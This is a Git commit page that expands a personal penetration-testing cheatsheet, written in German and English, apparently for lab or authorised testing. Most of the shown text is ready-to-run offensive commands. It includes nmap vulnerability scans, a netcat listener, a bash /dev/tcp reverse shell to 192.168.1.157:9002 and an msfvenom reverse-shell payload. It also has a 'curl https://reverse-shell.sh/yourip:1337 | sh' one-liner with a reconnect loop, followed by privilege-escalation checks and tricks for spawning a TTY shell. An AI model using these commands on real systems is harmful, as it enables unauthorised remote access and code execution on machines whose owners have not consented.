Rh17S15/pentesting
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

expanded Cheatsheet

Browse Source
This commit is contained in:
Rh17S15
2025-06-15 12:31:18 +02:00
parent a55740d423
commit da90202d73
1 changed files with 102 additions and 17 deletions
Download Patch File Download Diff File Expand all files Collapse all files

119
Cheatsheet.md
View File

@@ -26,70 +26,137 @@ to filter output for open ips
```bash
nmap -sn 192.168.1.0/24 | grep "for " | awk '{print $5}' > ips.txt
```
scan open ports
scan open ports:
```bash
nmap -sCV -A -p $(nmap 192.168.1.155 -p- | grep open | awk -F '/' '{print $1}' | tr '\n' ',' | sed 's/.$//') 192.168.1.155
```
#### bei windows
```bash
nmap --vuln ip
```
##### bei windows \+ smb
```bash
nmap --script vuln-smb* ip
nicht mehr sicher welches es war
nmap --script smb-vuln* ip
```
# inital access
### start listener:
```bash
rlwrap -cAr nc -nlvp 9002
```
### reverse shell bash:
```bash
/bin/bash -i >& /dev/tcp/192.168.1.157/9002 0>&1
```
### reverse shell file:
```bash
msfvenom -p cmd/unix/reverse_python LHOST=192.168.1.157 LPORT=9002 -f raw -o rev.py
```
-> from revshells.com
### untested:
Reverse Shell as a Service
1. On your machine:
```bash
nc -l 1337
or nlvp?
```
2. On the target machine:
```bash
curl https://reverse-shell.sh/yourip:1337 | sh
```
#### reconnecting:
```bash
while true; do curl https://reverse-shell.sh/yourip:1337 | sh; done
```
# privilege escalation
### always run these:
```bash
sudo -l
```
if sudo doesn't work:
[[#^78d3ce|spawn shell]]
#### check cronjobs
```bash
ls /etc/cron.*
crontab -l
```
## TTY Spawn Shell
Often during pen tests you may obtain a shell without having tty, yet wish to interact further with the system. Here are some commands which will allow you to spawn a tty shell. Obviously some of this will depend on the system environment and installed packages.
##### if sudo still doesn't work
use
```bash
sudo -S command
```
Often during pen tests you may obtain a shell without having tty, yet wish to interact further with the system. Here are some commands which will allow you to spawn a tty shell. Obviously some of this will depend on the system environment and installed packages.
### Python spawn shell
```bash
python -c 'import pty; pty.spawn("/bin/bash")'
```
Fully Interactive TTY
#### All the steps to stabilize your shell
**The first step:**
```bash
python3 -c 'import pty;pty.spawn("/bin/bash")'
```
Which uses Python to spawn a better-featured bash shell. At this point, our shell will look a bit prettier, but we still wont be able to use tab autocomplete or the arrow keys.
**Step two is:**
```bash
export TERM=xterm
```
This will give us access to term commands such as clear.
**Finally (and most importantly) we will background the shell using**
```bash
Ctrl + Z
```
Back in our own terminal we use
```bash
stty raw -echo; fg
```
This does two things: first, it turns off our own terminal echo which gives us access to tab autocompletes, the arrow keys, and Ctrl + C to kill processes
```bash
stty rows 38 columns 116
```
### OS system spawn shell
```bash
echo os.system("/bin/bash")
```
### Bash spawn shell
```bash
/bin/sh -i
```
### Perl spawn shell
```bash
perl —e 'exec "/bin/sh";'
```
### Ruby spawn shell
ruby: exec "/bin/sh"
@@ -104,12 +171,30 @@ exec "/bin/sh"
### VI spawn shell
```bash
:!bash
```
### VI(2) spawn shell
```bash
:set shell=/bin/bash:shell
```
### Nmap spawn shell
```bash
!sh
```
#### Exiftools
Metadaten auslesen:
```bash
exiftool picture.png
```
Binwalk (Binary Daten exportieren):
```bash
binwalk -e picture.png
```